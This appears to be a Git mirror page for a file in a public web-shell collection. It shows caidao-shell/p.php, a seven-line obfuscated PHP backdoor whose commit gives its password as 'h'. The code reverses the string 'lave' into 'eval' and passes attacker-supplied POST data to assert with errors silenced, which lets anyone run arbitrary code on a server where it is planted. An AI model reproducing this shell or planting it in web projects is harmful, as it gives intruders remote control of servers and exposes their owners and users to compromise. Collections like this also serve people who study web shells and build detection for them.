1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00
Files
webshell/caidao-shell/p.php
tennc 171b8329ec Create p.php
password: h
from: zone.wooyun.org
2015-07-11 08:23:00 +08:00

7 lines
74 B
PHP

<?php
$a='lave';
$b='($_POST[h])';
$a=strrev($a);
@assert($a.$b);
?>